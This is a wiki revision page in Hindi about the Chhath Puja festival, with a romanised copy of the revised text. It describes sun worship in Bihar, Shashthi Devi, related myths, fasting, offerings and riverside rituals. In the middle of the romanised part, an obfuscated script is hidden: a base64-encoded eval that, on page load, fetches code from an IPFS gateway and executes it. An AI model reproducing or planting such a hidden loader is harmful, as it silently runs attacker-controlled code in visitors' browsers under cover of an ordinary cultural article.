Difference between revisions of "छठपूजा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:अरुणाचल प्रदेश (को हटा दिया गया हैं।))
Line 2: Line 2:
 
[[चित्र:Chhath-Puja-1.jpg|thumb|छठपूजा, [[अरुणाचल प्रदेश]]]]
 
[[चित्र:Chhath-Puja-1.jpg|thumb|छठपूजा, [[अरुणाचल प्रदेश]]]]
 
{{tocright}}
 
{{tocright}}
[[दीपावली]] के एक [[सप्ताह]] पश्चात् [[बिहार]] में छठ का पर्व मनाया जाता है। एक [[दिन]] व रात तक समूचा बिहार व पूर्वी [[उत्तर प्रदेश]] [[गंगा]] के तट पर बसा प्रतीत होता है। इस दिन [[सूर्यदेव]] की उपासना व उन्हें अर्ध्य दिया जाता है। [[भारत]] के बिहार प्रदेश का सर्वाधिक प्रचलित एवं पावन पर्व है—सूर्यषष्ठी। यह पर्व मुख्यतः भगवान सूर्य का [[व्रत]] है। इस व्रत में सर्वतोभावेन सूर्य की पूजा की जाती है। वैसे तो सूर्य के साथ सप्तमी तिथि की संगति है, किन्तु बिहार के इस व्रत में सूर्य के साथ 'षष्ठी' तिथि का समन्वय विशेष महत्व का है। इस तिथि को सूर्य के साथ ही षष्ठी देवी की भी पूजा होती है। [[पुराण|पुराणों]] के अनुसार प्रकृति देवी के एक प्रधान अंश को 'देवसेना' कहते हैं; जो कि सबसे श्रेष्ठ मातृका मानी गई है। ये लोक के समस्त बालकों की रक्षिका देवी है। प्रकृति का छठा अंश होने के कारण इनका एक नाम "षष्ठी" भी है। षष्ठी देवी का पूजन–प्रसार ब्रह्मवैवर्त पुराण के अनुसार राजा प्रियव्रत के काल से आरम्भ हुआ। जब षष्ठी देवी की पूजा 'छठ मइया' के रूप में प्रचलित हुई। वास्तव में सूर्य को अर्ध्य तथा षष्ठी देवी का पूजन एक ही तिथि को पड़ने के कारण दोनों का समन्वय भारतीय जनमानस में इस प्रकार को गया कि सूर्य पूजा और छठ पूजा में भेद करना मुश्किल है। वास्तव में ये दो अलग–अलग त्यौहार हैं। सूर्य की षष्ठी को दोनों की ही पूजा होती है।  
+
[[उत्तराखंड]] का 'उत्तरायण पर्व' हो या [[केरल]] का [[ओणम]], [[कर्नाटक]] की 'रथसप्तमी' हो या [[बिहार]] का छठ पर्व, सभी इसका घोतक हैं कि [[भारत]] मूलत: सूर्य संस्कृति के उपासकों का देश है तथा बारह [[मास|महीनों]] के तीज-त्योहार सूर्य के [[संवत्सर]] चक्र के अनुसार मनाए जाते हैं। छठ से जुड़ी पौराणिक मान्यताओं और लोकगाथाओं पर गौर करे तो पता चलता है कि भारत के आदिकालीन सूर्यवंशी भरत राजाओं का यह मुख्य पर्व था। [[मगध]]<ref> आज का बिहार</ref>और [[आनर्त]]<ref> आज का गुजरात</ref> के राजनीतिक इतिहास के साथ भी छठ की ऐतिहासिक कडियां जुड़ती हैं। 
 
+
;मान्यताएँ
छठ बिहार का प्रमुख त्यौहार है। छठ का त्यौहार भगवान सूर्य को [[धरती]] पर धन–धान्य की प्रचुरता के लिए धन्यवाद देने के लिए मनाया जाता है। लोग अपनी विशेष इच्छाओं की पूर्ति के लिए भी इस पर्व को मनाते हैं। पर्व का आयोजन मुख्यतः गंगा के तट पर होता है और कुछ गाँवों में जहाँ पर गंगा नहीं पहुँच पाती है, वहाँ पर महिलाएँ छोटे तालाबों अथवा पोखरों के किनारे ही धूम–धाम से इस पर्व को मनाती हैं।  
+
*इस संबंध में मान्यता है कि मगध सम्राट [[जरासंध]] के एक पूर्वज का कुष्ठ रोग दूर करने के लिए शाकलद्वीपीय मग [[ब्राह्मण|ब्राह्मणों]] ने सूर्योंपासना की थी। तभी से यहा छठ पर सूर्योपासना का प्रचलन प्रारम्भ हुआ।
 +
*छठ के साथ आनर्त प्रदेश के सूर्यवंशी राजा शर्याति और [[च्यवन|भार्गव ऋषि च्यवन]] का भी ऐतिहासिक कथानक जुड़ा है। कहते हैं कि राजा शर्याति की पुत्री सुकन्या ने [[कार्तिक]] की [[षष्ठी]] को सूर्य की उपासना की तो च्यवन ऋषि के आँखों की ज्योति वापस आ गई।
 +
*'[[ब्रह्मवैवर्तपुराण]]' में छठ को [[मनु|स्वायम्भुव मनु]] के पुत्र प्रियव्रत के इतिहास से जोड़ते हुए बताया गया है कि षष्ठी देवी की कृपा से प्रियव्रत का मृत शिशु जीवित हो गया। तभी से प्रकृति का छठा अंश मानी जाने वाली षष्ठी देवी बालकों के रक्षिका और संतान देने वाली देवी के रूप में पूजी जाने लगी।
 +
*छठ के साथ स्कन्द पूजा की भी परम्परा जुड़ी है। [[शिव|भगवान शिव]] के तेज से उत्पन्न बालक [[स्कन्द]] की छह कृतिकाओं ने स्तनपान करा रक्षा की थी। इसी कारण स्कन्द के छह मुख हैं और उन्हें [[कार्तिकेय]] नाम से पुकारा जाने लगा।
 +
*कार्तिक से सम्बन्ध होने के कारण षष्ठी देवी को स्कन्द की पत्नी 'देवसेना' नाम से भी पूजा जाने लगा। 
 +
;वैदिक साहित्य में
 +
छठ पर असत होते और उगते सूर्य को अर्ध्य देने का यही निहितार्थ है कि समस्त प्रजाजनों का भरन पोषण करने वाला असली राजा सूर्य है। वैदिक साहित्य में प्रजा का भरण पोषण करने के कारण सूर्य को 'भरत' कहा गया है। यजुर्वेद के अनुसार सूर्य राष्ट्र है और राष्ट्रपति भी। सूर्य की भरत संज्ञा के कारण सूर्यवंशी आर्य भरतगण कहलाने लगे। बाद में इन्हीं सूर्योपासक भरतवंशियों से शासित देश 'भारतवर्ष' कहलाया। भारतवासियों के लिए समस्त कामनाओं की पूर्ति तो भगवान सूर्य से हो जाती है। किंतु  पुत्रेषणा की पूरि मातृस्वरुमा प्रकृति देवी से ही होती है। इसलिए परब्रह्म स्वरुप सूर्य और उनकी शक्तिस्वरूपा षष्ठी देवी की पूजा अर्चना की परम्परा हजारों वर्षों से प्रचलित है। आज छठ बिहार और उत्तर प्रदेश से ही जुड़ा आंचलिक नहीं रह गया है बल्कि दिल्ली, मुम्बई, कोलकाता और चेन्नई जैसे महानगरों में भी श्रद्धाभाव से मनाया जाने वाले पर्व का रूप धारण कर चुका है।
 +
;बिहार  में  छ्ठ पर्व
 +
'''[[दीपावली]] के एक [[सप्ताह]] पश्चात [[बिहार]] में छठ का पर्व''' मनाया जाता है। एक [[दिन]] व रात तक समूचा बिहार व पूर्वी [[उत्तर प्रदेश]] [[गंगा]] के तट पर बसा प्रतीत होता है। इस दिन [[सूर्यदेव]] की उपासना व उन्हें अर्ध्य दिया जाता है। [[भारत]] के बिहार प्रदेश का सर्वाधिक प्रचलित एवं पावन पर्व है - सूर्यषष्ठी। यह पर्व मुख्यतः भगवान सूर्य का [[व्रत]] है। इस व्रत में सर्वतोभावेन सूर्य की पूजा की जाती है। वैसे तो सूर्य के साथ [[सप्तमी]] [[तिथि]] की संगति है, किन्तु बिहार के इस व्रत में सूर्य के साथ '[[षष्ठी]]' तिथि का समन्वय विशेष महत्व का है।  
 +
;षष्ठी देवी
 +
इस तिथि को सूर्य के साथ ही '''षष्ठी देवी''' की भी पूजा होती है। [[पुराण|पुराणों]] के अनुसार प्रकृति देवी के एक प्रधान अंश को 'देवसेना' कहते हैं; जो कि सबसे श्रेष्ठ 'मातृका' मानी गई है। ये लोक के समस्त बालकों की रक्षिका देवी है। प्रकृति का छठा अंश होने के कारण इनका एक नाम "षष्ठी" भी है। षष्ठी देवी का पूजन - प्रसार [[ब्रह्मवैवर्त पुराण]] के अनुसार राजा प्रियव्रत के काल से आरम्भ हुआ। जब षष्ठी देवी की पूजा 'छठ मइया' के रूप में प्रचलित हुई। वास्तव में सूर्य को अर्ध्य तथा षष्ठी देवी का पूजन एक ही तिथि को पड़ने के कारण दोनों का समन्वय भारतीय जनमानस में इस प्रकार को गया कि सूर्य पूजा और छठ पूजा में भेद करना मुश्किल है। वास्तव में ये दो अलग - अलग त्यौहार हैं। सूर्य की षष्ठी को दोनों की ही पूजा होती है।  
 +
;प्रमुख  त्योहार
 +
छठ बिहार का प्रमुख त्यौहार है। छठ का त्यौहार भगवान सूर्य को [[धरती]] पर धन–धान्य की प्रचुरता के लिए धन्यवाद देने के लिए मनाया जाता है। लोग अपनी विशेष इच्छाओं की पूर्ति के लिए भी इस पर्व को मनाते हैं। पर्व का आयोजन मुख्यतः गंगा के तट पर होता है और कुछ गाँवों में जहाँ पर गंगा नहीं पहुँच पाती है, वहाँ पर महिलाएँ छोटे तालाबों अथवा पोखरों के किनारे ही धूमधाम से इस पर्व को मनाती हैं।  
  
 
==छठ महोत्सव और धार्मिक कर्मकाण्ड==
 
==छठ महोत्सव और धार्मिक कर्मकाण्ड==
चुंकि इस त्यौहार पर न तो किसी मन्दिर में पूजा हेतु जाया जाता है, और न ही घर की कोई विशेष सफ़ाई की जाती है। इससे ऐसा प्रतीत होता है कि यह पर्व बहुत ही आसानी से या बिना किसी कर्मकाण्ड के मना लिया जाता है। लेकिन ऐसा नहीं है, बल्कि इस त्यौहार पर इतने कर्मकाण्ड होते हैं कि विशेष अनुष्ठानों की तुलना में तो मध्यकालीन [[फ्राँसीसी]] विधान भी तुच्छ प्रतीत होंगे।
+
इस त्यौहार पर न तो किसी मन्दिर में पूजा हेतु जाया जाता है, और न ही घर की कोई विशेष सफ़ाई की जाती है। इससे ऐसा प्रतीत होता है कि यह पर्व बहुत ही आसानी से या बिना किसी कर्मकाण्ड के मना लिया जाता है। लेकिन ऐसा नहीं है, बल्कि इस त्यौहार पर इतने कर्मकाण्ड होते हैं कि विशेष अनुष्ठानों की तुलना में तो मध्यकालीन [[फ्राँसीसी]] विधान भी तुच्छ प्रतीत होंगे।
  
 
==स्नान एवं उपवास==
 
==स्नान एवं उपवास==
सांध्य सूर्यपूजा के एक दिन पहले, श्रद्धालु शुद्धिकरण के लिए विशेषरूप से गंगा में डुबकी लगाते हैं तथा [[गंगा जल|गंगा का पवित्र जल]] अर्पण हेतु घर साथ लाते हैं। पूरे दिन में उपवास रखा जाता है तथा श्रद्धालु देर शाम तक पूजा के बाद ही उपवास तोड़ते हैं।
+
सांध्य सूर्यपूजा के एक दिन पहले, श्रद्धालु शुद्धिकरण के लिए विशेषरूप से गंगा में डुबकी लगाते हैं तथा [[गंगा जल|गंगा का पवित्र जल]] अर्पण हेतु घर साथ लाते हैं। पूरे दिन में [[उपवास]] रखा जाता है तथा श्रद्धालु देर शाम तक पूजा के बाद ही उपवास तोड़ते हैं।
  
 
==प्रसाद एवं अर्पण की वस्तुएँ==
 
==प्रसाद एवं अर्पण की वस्तुएँ==
[[चावल]] का हलुआ, पूड़ी तथा [[केला]]—ये ही इस दिन की विशेष भोजन सामग्री हैं। अर्पण के पश्चात् इन्हीं भोज्य पदार्थों को मित्रों एवं सम्बन्धियों में बाँटा जाता है। लोग बड़ी ही श्रद्धा से इसे खाते हैं।  
+
[[चावल]] का हलुआ, पूड़ी तथा [[केला]]—ये ही इस दिन की विशेष भोजन सामग्री हैं। अर्पण के पश्चात इन्हीं भोज्य पदार्थों को मित्रों एवं सम्बन्धियों में बाँटा जाता है। लोग बड़ी ही श्रद्धा से इसे खाते हैं।  
 
[[चित्र:Chhath-Puja-2.jpg|thumb|left|छठपूजा, [[अरुणाचल प्रदेश]]]]
 
[[चित्र:Chhath-Puja-2.jpg|thumb|left|छठपूजा, [[अरुणाचल प्रदेश]]]]
 
==शुभ दिन-संझा वाट==
 
==शुभ दिन-संझा वाट==
दूसरे दिन चौबीस घंटे का उपवास प्रारम्भ होता है। दिनभर प्रसाद बनाने की तैयारी होती है तथा संध्या को भक्तगण छठ मैया का गीत गाते हुए नदी तट, जलकुण्ड या तालाब पर पहुँच जाते हैं। वहाँ पर अस्त होते हुए सूर्य को उपर्युक्त प्रसाद का अर्पण किया जाता है। रात्रि के समय श्रद्धालु घर लौटते हैं, जहाँ पर एक अन्य महोत्सव प्रतीक्षारत होता है। गन्ने की टहनियों से बने एक छत्र के नीचे दीपयुक्त मिट्टी के हाथी व प्रसाद से भरे बर्तन रखे जाते हैं। श्रद्धालु उपवास के समय जल भी ग्रहण नहीं करते हैं। सूर्योदय से ठीक पहला, भक्तगण नदी तट की ओर पुनः छठ मैया के गीत गाते हुए प्रस्थान करते हैं तथा उदयमान सूर्य की उपासना अर्चना करते हैं। प्रार्थना के पश्चात् प्रत्येक व्यक्ति को प्रसाद प्रदान किया जाता है। इस प्रसाद में विशेष रूप से पत्थर की सिल पर पीसे हुए आटे का प्रयोग होता है। इस आटे को देर तक तला जाता है तथा इसमें मीठा डालकर इसकी गोलकार गठ्ठियाँ बनायी जाती हैं, जिसे "ठेकुआ" कहते हैं। इसके अलावा इस विशेष प्रसाद में [[अंगूर]], पूरा [[नारियल]], केले व मसूर की दाल के दाने भी होते हैं। पूजा के समय ये सभी वस्तुएँ [[बाँस]] की अर्धगोलाकार टोकरियों में रखी जाती हैं। इन टोकरियों का "सूप" कहते हैं।  
+
दूसरे दिन चौबीस घंटे का उपवास प्रारम्भ होता है। दिनभर प्रसाद बनाने की तैयारी होती है तथा संध्या को भक्तगण छठ मैया का गीत गाते हुए नदी तट, जलकुण्ड या तालाब पर पहुँच जाते हैं। वहाँ पर अस्त होते हुए सूर्य को उपर्युक्त प्रसाद का अर्पण किया जाता है। रात्रि के समय श्रद्धालु घर लौटते हैं, जहाँ पर एक अन्य महोत्सव प्रतीक्षारत होता है। गन्ने की टहनियों से बने एक छत्र के नीचे दीपयुक्त [[मिट्टी]] के [[हाथी]] व प्रसाद से भरे बर्तन रखे जाते हैं। श्रद्धालु उपवास के समय [[जल]] भी ग्रहण नहीं करते हैं। सूर्योदय से ठीक पहला, भक्तगण नदी तट की ओर पुनः छठ मैया के गीत गाते हुए प्रस्थान करते हैं तथा उदयमान सूर्य की उपासना अर्चना करते हैं। प्रार्थना के पश्चात प्रत्येक व्यक्ति को प्रसाद प्रदान किया जाता है। इस प्रसाद में विशेष रूप से पत्थर की सिल पर पीसे हुए आटे का प्रयोग होता है। इस आटे को देर तक तला जाता है तथा इसमें मीठा डालकर इसकी गोलकार गठ्ठियाँ बनायी जाती हैं, जिसे "ठेकुआ" कहते हैं। इसके अलावा इस विशेष प्रसाद में [[अंगूर]], पूरा [[नारियल]], केले व मसूर की दाल के दाने भी होते हैं। पूजा के समय ये सभी वस्तुएँ [[बाँस]] की अर्धगोलाकार टोकरियों में रखी जाती हैं। इन टोकरियों का "सूप" कहते हैं।  
  
 
==रंग-बिरंगा उत्सव है==
 
==रंग-बिरंगा उत्सव है==
Line 22: Line 34:
  
 
==नियम एवं व्रत पालन==
 
==नियम एवं व्रत पालन==
जैसे ही दीपावली का आनन्द शान्त होता दिखाई पड़ता है, छठ की छटा खिल उठती है। प्रौढ़ विवाहित स्त्रियाँ ही सभी तैयारियाँ करती हैं। एक ओर आयु में कम स्त्रियाँ व बच्चे घर के अन्य कार्यों का सम्भालते हैं, दूसरी ओर प्रौढ़ स्त्रियाँ उन वस्तुओं की भली–भाँति सफ़ाई–धुलाई करती हैं, जिनका प्रयोग पूजा, प्रसाद में होता है। सभी वस्तुओं की चाहे वह रसोई का चूल्हा हो, करछुल हो, पकान में प्रयोग आने वाली पकड़ हो या भूनने का पात्र–सबकी पूरी तरह से सफ़ाई की जाती है। नये पीसे हुए चावलों की लेई बनाई जाती है। सूखी मेवा व नारियाल के टुकड़ों को स्वाद बढ़ाने के लिए प्रयोग किया जाता है। इनको आटे में मिला कर लड्डू बनाए जाते हैं। पारम्परिक व्यंजन 'ठेकुआ' [[गेहूँ]] के मड़े हुए आटे को विभिन्न आकारों में काटकर बनाया जाता है। इसके लिए काष्ठ के साँचों का भी प्रयोग किया जाता है। तत्पश्चात् इसे गाढ़े [[भूरा रंग|भूरे रंग]] का होने तक तला जाता है। तलने के बाद यह अत्यन्त कुरकुरा हो जाता है तथा बड़े ही स्वाद से खाया जाता है। पश्चिम के देशों में लोकप्रिय व्यंजन "कुकी" की भाँति ही इसमें घर का बना मक्खन, बहुत सा गुड़ तथा नारियल डाला जाता है।  
+
जैसे ही दीपावली का आनन्द शान्त होता दिखाई पड़ता है, छठ की छटा खिल उठती है। प्रौढ़ विवाहित स्त्रियाँ ही सभी तैयारियाँ करती हैं। एक ओर आयु में कम स्त्रियाँ व बच्चे घर के अन्य कार्यों का सम्भालते हैं, दूसरी ओर प्रौढ़ स्त्रियाँ उन वस्तुओं की भली–भाँति सफ़ाई-धुलाई करती हैं, जिनका प्रयोग पूजा, प्रसाद में होता है। सभी वस्तुओं की चाहे वह रसोई का चूल्हा हो, करछुल हो, पकाने  में प्रयोग आने वाली पकड़ हो या भूनने का पात्र-सबकी पूरी तरह से सफ़ाई की जाती है। नये पीसे हुए चावलों की लेई बनाई जाती है। सूखी मेवा व नारियल के टुकड़ों को स्वाद बढ़ाने के लिए प्रयोग किया जाता है। इनको आटे में मिला कर लड्डू बनाए जाते हैं। पारम्परिक व्यंजन 'ठेकुआ' [[गेहूँ]] के मड़े हुए आटे को विभिन्न आकारों में काटकर बनाया जाता है। इसके लिए काष्ठ के साँचों का भी प्रयोग किया जाता है। तत्पश्चात इसे गाढ़े [[भूरा रंग|भूरे रंग]] का होने तक तला जाता है। तलने के बाद यह अत्यन्त कुरकुरा हो जाता है तथा बड़े ही स्वाद से खाया जाता है। पश्चिम के देशों में लोकप्रिय व्यंजन "कुकी" की भाँति ही इसमें घर का बना मक्खन, बहुत सा गुड़ तथा नारियल डाला जाता है।  
  
इस प्रसाद को बनाने के लिए गृहस्थ प्रौढ़ महिला कुछ नियमों का पालन करती है। जैसे वह पका हुआ खाना नहीं खाती तथा सिले हुए वस्त्र नहीं पहनतीं। रसोई में जाने से पहले प्रत्येक व्यक्ति का स्नान करना आवश्यक होता है।  
+
इस प्रसाद को बनाने के लिए गृहस्थ प्रौढ़ महिला कुछ नियमों का पालन करती है। जैसे- वह पका हुआ खाना नहीं खाती तथा सिले हुए वस्त्र नहीं पहनतीं। रसोई में जाने से पहले प्रत्येक व्यक्ति का स्नान करना आवश्यक होता है।  
 
 
 
 
 
==सांध्य पूजन का महामेला==
 
==सांध्य पूजन का महामेला==
 
[[चित्र:Chhath-Puja.jpg|thumb|250px|छठपूजा, [[अरुणाचल प्रदेश]]]]
 
[[चित्र:Chhath-Puja.jpg|thumb|250px|छठपूजा, [[अरुणाचल प्रदेश]]]]
समवेत स्वर में लोकप्रिय भक्ति संगीत गाते हुए लोगों के छोटे–छोटे समूह प्रत्येक घर से निकलते हैं और नदी तट तक पहुँचते–पहुँचते ये जुलूस एक विशाल जनसमूह का रूप ले लेते हैं। जुलूस में सम्मिलित पुरुष अपने वक्ष को नग्न रखते हैं तथा प्रसाद को बाँस की छोटी–छोटी टोकरियों में लेकर चलते हैं। इन टोकरियों को जाने–अनजाने जूठा होने से बचाने के लिए ऊँचाई पर रखा जाता है। इन टोकरियों में लड्डू, ठेकुआ तथा मौसमी फल होते हैं। नारियल, केले के गुच्छे, एक–दो सन्तरे इत्यादि को [[हल्दी]] में रंगे कपड़े से ढंका जाता है। इन पदार्थों के अतिरिक्त एक मिट्टी का [[दीपक]] भी इन टोकरियों में रखा जाता है।  
+
समवेत स्वर में लोकप्रिय भक्ति [[संगीत]] गाते हुए लोगों के छोटे–छोटे समूह प्रत्येक घर से निकलते हैं और नदी तट तक पहुँचते–पहुँचते ये जुलूस एक विशाल जनसमूह का रूप ले लेते हैं। जुलूस में सम्मिलित पुरुष अपने वक्ष को नग्न रखते हैं तथा प्रसाद को बाँस की छोटी–छोटी टोकरियों में लेकर चलते हैं। इन टोकरियों को जाने–अनजाने जूठा होने से बचाने के लिए ऊँचाई पर रखा जाता है। इन टोकरियों में लड्डू, ठेकुआ तथा मौसमी फल होते हैं। नारियल, केले के गुच्छे, एक-दो सन्तरे इत्यादि को [[हल्दी]] में रंगे कपड़े से ढंका जाता है। इन पदार्थों के अतिरिक्त एक मिट्टी का [[दीपक]] भी इन टोकरियों में रखा जाता है।  
  
जैसे ही सूर्यास्त होता है, प्रार्थना–पूजा आरम्भ हो जाती है। नदी तट पर किसी का फिसलना या कोई भूल करना एक दैविक संकट का प्रतीक माना जाता है। नवशीत में पश्चिम के ओजस्वी आकाश ललाट पर श्रद्धा–भक्ति–प्रेम का वांग्मय दृश्य प्रकाशित हो उठता है–सहस्रों उठे हस्त धारण करते हैं, बाँस की थालियाँ व टोकरियाँ। मध्यम लौ में प्रकाशित ढके हुए दीपक मंत्रोच्चारित वातावरण को देदीप्यमान कर देते हैं। पल बीतता है, मुखाकृतियाँ धूमिल हो उठती हैं और अंधेरा होते ही जनसमूह नदी तट से वापस घर लौटना प्रारम्भ करता है।  
+
जैसे ही सूर्यास्त होता है, प्रार्थना-पूजा आरम्भ हो जाती है। नदी तट पर किसी का फिसलना या कोई भूल करना एक दैविक संकट का प्रतीक माना जाता है। नवशीत में पश्चिम के ओजस्वी आकाश ललाट पर श्रद्धा–भक्ति–प्रेम का वांग्मय दृश्य प्रकाशित हो उठता है- सहस्रों उठे हस्त धारण करते हैं, बाँस की थालियाँ व टोकरियाँ। मध्यम लौ में प्रकाशित ढके हुए दीपक मंत्रोच्चारित वातावरण को देदीप्यमान कर देते हैं। पल बीतता है, मुखाकृतियाँ धूमिल हो उठती हैं और अंधेरा होते ही जनसमूह नदी तट से वापस घर लौटना प्रारम्भ करता है।  
  
 
==नवोदित सूर्य की अर्चना का महोत्सव==
 
==नवोदित सूर्य की अर्चना का महोत्सव==
अस्ताचल सूर्य को श्रद्धाजंली प्रदान करने के पश्चात् अब समय होता है, सूर्योदय प्रार्थना की तैयारी का। यह पूजा विधान का अभिन्न अंग है। नदी तट की ओर यात्रा उषा से ही प्रारम्भ हो जाती है। [[कृष्णपक्ष]] के [[चन्द्रमा]] के कारण बाहर आकाश मार्ग वृक्ष की भाँति काला प्रतीत होता है। ओस से भीगी घास व प्रवाहित होते जल की ध्वनि ही नदी तट निकट होने का संकेत देती है। इस समय सभी पूर्व की ओर मुख करते हैं और नदी में स्नान के लिए आगे बढ़ते हैं। इसी बीच टोकरियों को एक अस्थाई मण्डप के नीचे सुरक्षित रखा जाता है। इस मण्डप को ताज़ा उपजे [[गन्ना|गन्ने]] की टहनियों से बनाया जाता है। इसके लिए एक विशेष ढाँचा बनाया जाता है, तथा इसके कोनों को [[हाथी]] व पक्षी के रूप में बनाए मिट्टी के दीपकों से सजाया जाता है। निर्मलता व शुद्धि रखने व क्रूर दुरात्माओं को दूर रखने के लिए [[चन्दन]] का लेप, सिन्दूर, भीगे चावल, [[फल]] व [[पुष्प]] भी रंगे हुए लाल सूती वस्त्र के भीतर रखे जाते हैं। जैसे ही सूर्य की किरणें उदित होती हैं, साड़ी व धोती पहने स्त्री–पुरुष उथले पानी में कूद पड़ते हैं। पैर जमाकर ये लोग जल की अतिशीतलता को भूल जाते हैं तथा ऋग्वैदिक के उस कालातीत मंत्र, जो विशेष रूप से सूर्य के लिए है—[[गायत्री मंत्र]]—का उच्चारण करते हुए [[स्नान]] कर सूर्य की श्रद्धा से पूजा करना प्रारम्भ करते हैं।
+
अस्ताचल सूर्य को श्रद्धाजंलि  प्रदान करने के पश्चात अब समय होता है, सूर्योदय प्रार्थना की तैयारी का। यह पूजा विधान का अभिन्न अंग है। नदी तट की ओर यात्रा उषा से ही प्रारम्भ हो जाती है। [[कृष्णपक्ष]] के [[चन्द्रमा]] के कारण बाहर आकाश मार्ग वृक्ष की भाँति काला प्रतीत होता है। ओस से भीगी घास व प्रवाहित होते जल की ध्वनि ही नदी तट निकट होने का संकेत देती है। इस समय सभी पूर्व की ओर मुख करते हैं और नदी में स्नान के लिए आगे बढ़ते हैं। इसी बीच टोकरियों को एक अस्थाई मण्डप के नीचे सुरक्षित रखा जाता है। इस मण्डप को ताज़ा उपजे [[गन्ना|गन्ने]] की टहनियों से बनाया जाता है। इसके लिए एक विशेष ढाँचा बनाया जाता है, तथा इसके कोनों को [[हाथी]] व पक्षी के रूप में बनाए मिट्टी के दीपकों से सजाया जाता है। निर्मलता व शुद्धि रखने व क्रूर दुरात्माओं को दूर रखने के लिए [[चन्दन]] का लेप, सिन्दूर, भीगे चावल, [[फल]] व [[पुष्प]] भी रंगे हुए लाल सूती वस्त्र के भीतर रखे जाते हैं। जैसे ही सूर्य की किरणें उदित होती हैं, साड़ी व धोती पहने स्त्री–पुरुष उथले पानी में कूद पड़ते हैं। पैर जमाकर ये लोग जल की अतिशीतलता को भूल जाते हैं तथा ऋग्वैदिक के उस कालातीत मंत्र, जो विशेष रूप से सूर्य के लिए है - [[गायत्री मंत्र]] का उच्चारण करते हुए [[स्नान]] कर सूर्य की श्रद्धा से पूजा करना प्रारम्भ करते हैं।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 12:30, 1 November 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

[[chitr:Chhath-Puja-1.jpg|thumb|chhathapooja, arunachal pradesh]]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

uttarakhand ka 'uttarayan parv' ho ya keral ka onam, karnatak ki 'rathasaptami' ho ya bihar ka chhath parv, sabhi isaka ghotak haian ki bharat moolat: soory sanskriti ke upasakoan ka desh hai tatha barah mahinoan ke tij-tyohar soory ke sanvatsar chakr ke anusar manae jate haian. chhath se ju di pauranik manyataoan aur lokagathaoan par gaur kare to pata chalata hai ki bharat ke adikalin sooryavanshi bharat rajaoan ka yah mukhy parv tha. magadh[1]aur anart[2] ke rajanitik itihas ke sath bhi chhath ki aitihasik kadiyaan ju dati haian.

manyataean
  • is sanbandh mean manyata hai ki magadh samrat jarasandh ke ek poorvaj ka kushth rog door karane ke lie shakaladvipiy mag brahmanoan ne sooryoanpasana ki thi. tabhi se yaha chhath par sooryopasana ka prachalan prarambh hua.
  • chhath ke sath anart pradesh ke sooryavanshi raja sharyati aur bhargav rrishi chyavan ka bhi aitihasik kathanak ju da hai. kahate haian ki raja sharyati ki putri sukanya ne kartik ki shashthi ko soory ki upasana ki to chyavan rrishi ke aankhoan ki jyoti vapas a gee.
  • 'brahmavaivartapuran' mean chhath ko svayambhuv manu ke putr priyavrat ke itihas se jo date hue bataya gaya hai ki shashthi devi ki kripa se priyavrat ka mrit shishu jivit ho gaya. tabhi se prakriti ka chhatha aansh mani jane vali shashthi devi balakoan ke rakshika aur santan dene vali devi ke roop mean pooji jane lagi.
  • chhath ke sath skand pooja ki bhi parampara ju di hai. bhagavan shiv ke tej se utpann balak skand ki chhah kritikaoan ne stanapan kara raksha ki thi. isi karan skand ke chhah mukh haian aur unhean kartikey nam se pukara jane laga.
  • kartik se sambandh hone ke karan shashthi devi ko skand ki patni 'devasena' nam se bhi pooja jane laga.
vaidik sahity mean

chhath par asat hote aur ugate soory ko ardhy dene ka yahi nihitarth hai ki samast prajajanoan ka bharan poshan karane vala asali raja soory hai. vaidik sahity mean praja ka bharan poshan karane ke karan soory ko 'bharat' kaha gaya hai. yajurved ke anusar soory rashtr hai aur rashtrapati bhi. soory ki bharat sanjna ke karan sooryavanshi ary bharatagan kahalane lage. bad mean inhian sooryopasak bharatavanshiyoan se shasit desh 'bharatavarsh' kahalaya. bharatavasiyoan ke lie samast kamanaoan ki poorti to bhagavan soory se ho jati hai. kiantu putreshana ki poori matrisvaruma prakriti devi se hi hoti hai. isalie parabrahm svarup soory aur unaki shaktisvaroopa shashthi devi ki pooja archana ki parampara hajaroan varshoan se prachalit hai. aj chhath bihar aur uttar pradesh se hi ju da aanchalik nahian rah gaya hai balki dilli, mumbee, kolakata aur chennee jaise mahanagaroan mean bhi shraddhabhav se manaya jane vale parv ka roop dharan kar chuka hai.

bihar mean chhth parv

dipavali ke ek saptah pashchat bihar mean chhath ka parv manaya jata hai. ek din v rat tak samoocha bihar v poorvi uttar pradesh ganga ke tat par basa pratit hota hai. is din sooryadev ki upasana v unhean ardhy diya jata hai. bharat ke bihar pradesh ka sarvadhik prachalit evan pavan parv hai - sooryashashthi. yah parv mukhyatah bhagavan soory ka vrat hai. is vrat mean sarvatobhaven soory ki pooja ki jati hai. vaise to soory ke sath saptami tithi ki sangati hai, kintu bihar ke is vrat mean soory ke sath 'shashthi' tithi ka samanvay vishesh mahatv ka hai.

shashthi devi

is tithi ko soory ke sath hi shashthi devi ki bhi pooja hoti hai. puranoan ke anusar prakriti devi ke ek pradhan aansh ko 'devasena' kahate haian; jo ki sabase shreshth 'matrika' mani gee hai. ye lok ke samast balakoan ki rakshika devi hai. prakriti ka chhatha aansh hone ke karan inaka ek nam "shashthi" bhi hai. shashthi devi ka poojan - prasar brahmavaivart puran ke anusar raja priyavrat ke kal se arambh hua. jab shashthi devi ki pooja 'chhath miya' ke roop mean prachalit huee. vastav mean soory ko ardhy tatha shashthi devi ka poojan ek hi tithi ko p dane ke karan donoan ka samanvay bharatiy janamanas mean is prakar ko gaya ki soory pooja aur chhath pooja mean bhed karana mushkil hai. vastav mean ye do alag - alag tyauhar haian. soory ki shashthi ko donoan ki hi pooja hoti hai.

pramukh tyohar

